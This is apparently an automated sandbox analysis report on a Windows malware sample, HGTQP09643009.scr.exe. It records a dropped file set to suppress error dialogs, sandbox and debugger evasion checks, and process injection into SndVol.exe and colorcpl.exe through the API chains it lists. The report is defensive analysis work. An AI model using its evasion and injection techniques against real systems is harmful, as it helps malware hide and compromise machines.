                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0291CC940_2_0291CC94
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040F7A7 Sleep,ExitProcess,3_2_0040F7A7
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05360474 Sleep,ExitProcess,3_2_05360474
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-24201
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_0041A748
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_0536B415
                    Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 9478Jump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: foregroundWindowGot 1756Jump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 9.2 %
                    Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 9.5 %
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0291CC940_2_0291CC94
                    Source: C:\Windows\SysWOW64\SndVol.exe TID: 2860Thread sleep time: -73500s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exe TID: 5808Thread sleep time: -474000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exe TID: 5808Thread sleep time: -28434000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_029058B4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_029058B4
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409253
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C291
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C34D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409665
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0044E879 FindFirstFileExA,3_2_0044E879
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_0040880C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040783C FindFirstFileW,FindNextFileW,3_2_0040783C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419AF5
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB30
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD37
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05358509 FindFirstFileW,FindNextFileW,3_2_05358509
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0539F546 FindFirstFileExA,3_2_0539F546
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053594D9 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_053594D9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535C7FD FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0535C7FD
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536A7C2 FindFirstFileW,3_2_0536A7C2
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535D01A FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0535D01A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535A332 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_0535A332
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05359F20 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_05359F20
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536CF5E FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0536CF5E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535CA04 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0535CA04
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_1E6C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_1E6C10F1
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_1E6C6580 FindFirstFileExA,3_2_1E6C6580
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407EF8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00407C97
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00418981 memset,GetSystemInfo,4_2_00418981
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.00000000007B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW x~%SystemRoot%\system32\mswsock.dllxxw
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.00000000007E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^>9
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2019710060.00000000034F9000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408677302.00000000034F9000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 00000009.00000002.2160077550.0000000000745000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000072F000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.00000000008CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: bhv3259.tmp.4.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-24199
                    Source: C:\Windows\SysWOW64\SndVol.exeAPI call chain: ExitProcess graph end nodegraph_3-103566
                    Source: C:\Windows\SysWOW64\SndVol.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004349F9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02917CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02917CA8
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_029473AD mov eax, dword ptr fs:[00000030h]0_2_029473AD
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004432B5 mov eax, dword ptr fs:[00000030h]3_2_004432B5
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535114A mov eax, dword ptr fs:[00000030h]3_2_0535114A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535114A mov eax, dword ptr fs:[00000030h]3_2_0535114A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05393F82 mov eax, dword ptr fs:[00000030h]3_2_05393F82
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_1E6C4AB4 mov eax, dword ptr fs:[00000030h]3_2_1E6C4AB4
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,3_2_00411CFE
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004349F9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00434B47 SetUnhandledExceptionFilter,3_2_00434B47
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043BB22
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00434FDC
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0538C7EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0538C7EF
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053856C6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_053856C6
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05385CA9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_05385CA9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05385814 SetUnhandledExceptionFilter,3_2_05385814
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_1E6C2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1E6C2B1C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_1E6C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1E6C2639
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_1E6C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1E6C60E2

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 5350000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6F80000 protect: page execute and read and write
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,3_2_004180EF
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeThread created: C:\Windows\SysWOW64\SndVol.exe EIP: 5351638Jump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6F81638
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeMemory written: C:\Windows\SysWOW64\SndVol.exe base: 5350000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6F80000 value starts with: 4D5A
                    Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeMemory written: C:\Windows\SysWOW64\SndVol.exe base: 5350000Jump to behavior
